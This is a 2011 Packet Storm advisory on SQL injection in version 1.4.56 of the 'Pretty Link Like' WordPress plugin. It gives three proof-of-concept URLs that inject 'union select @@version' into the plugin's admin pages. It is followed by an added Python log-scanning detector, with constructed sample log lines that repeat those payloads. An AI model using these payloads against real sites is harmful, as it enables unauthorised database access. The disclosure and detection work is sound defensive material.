Source: packetstorm | Author: MaKyOtOx | ID: PACKETSTORM:102608
Published: Jun 27, 2011 - 12:00 a.m.

WordPress Pretty Link Like 1.4.56 SQL Injection

packetstormsecurity.com
`# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL Injection  
# Google Dork: N/A  
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin)  
# Date: 27/06/2011  
# Software Link: http://wordpress.org/extend/plugins/pretty-link/  
# Version: 1.4.56 (not tested on previous versions)  
# Tested on: WhatEver OS  
# CVE : 0-Day  
  
  
PoC 1 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union select @@version  
PoC 2 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union select @@version  
PoC 3 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union select @@version  
`
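
For checking web server logs against the three requests above, the following is an added detection example, not part of the original advisory or the plugin's code. It flags requests to the two plugin admin pages where `group` or `l` is not a plain integer. It assumes those parameters carry numeric ids in normal use and that logs are in combined log format; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameters named in the advisory's three PoC URLs.
WATCHED = {
    "pretty-link/prli-clicks.php": ("group", "l"),
    "pretty-link/prli-links.php": ("group",),
}
# Assumption: these parameters carry numeric ids in normal use.
NUMERIC = re.compile(r"\d+")
# Request target inside a combined-log-format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(param, value)] for watched parameters that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    query = parse_qs(parts.query)  # decodes %20 and '+' before the check
    hits = []
    for page in query.get("page", []):
        for name in WATCHED.get(page, ()):
            for value in query.get(name, []):
                if not NUMERIC.fullmatch(value):
                    hits.append((name, value))
    return hits


def scan(lines):
    """Yield (line_number, param, value) for each flagged request in a log."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                yield number, name, value


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2011:10:00:01 +0000] "GET /wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Jun/2011:10:00:07 +0000] "GET /wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1%20union%20select%20@@version HTTP/1.1" 200 812',
    '192.0.2.44 - - [27/Jun/2011:10:00:09 +0000] "GET /wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1+union+select+@@version HTTP/1.1" 200 790',
    '192.0.2.10 - - [27/Jun/2011:10:00:12 +0000] "GET /wp-admin/admin.php?page=akismet&group=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

Because the PoC URLs target `wp-admin`, a hit also identifies an authenticated session worth reviewing alongside the flagged request.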